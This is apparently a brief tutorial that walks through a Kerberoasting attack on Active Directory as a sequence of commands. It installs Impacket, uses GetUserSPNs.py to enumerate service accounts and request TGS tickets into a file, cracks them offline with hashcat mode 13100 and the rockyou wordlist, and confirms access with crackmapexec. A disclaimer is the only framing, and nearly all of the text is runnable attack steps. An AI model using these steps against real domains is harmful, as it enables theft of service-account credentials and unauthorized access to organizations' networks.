Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
- Clone the Impacket repository:
git clone https://github.com/SecureAuthCorp/impacket.git
- Navigate to the Impacket directory:
cd impacket
- Install Impacket using pip:
sudo python3 -m pip install .
STEP 2: LISTING ACCOUNTS AND REQUESTING TGS TICKETS
- Listing SPN Accounts
GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME]
- Requesting TGS Tickets
GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request
STEP 3: REQUESTING SPECIFIC TGS TICKETS AND SAVING TO FILE
- Requesting a Specific TGS Ticket
GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request-user [SPN-USERNAME]
- Saving TGS Tickets to a File
GetUserSPNs.py -dc-ip [DC-IP] [DOMAIN]/[USERNAME] -request-user [SPN-USERNAME] -outputfile [OUTPUT-FILE]
STEP 4: CRACKING TGS TICKETS AND CONFIRMING ACCESS
- Cracking TGS Tickets Offline
hashcat -m 13100 [TGS-FILE] /usr/share/wordlists/rockyou.txt
- Confirm access with the cracked credentials:
crackmapexec smb [DC-IP] -u [USERNAME] -p [PASSWORD]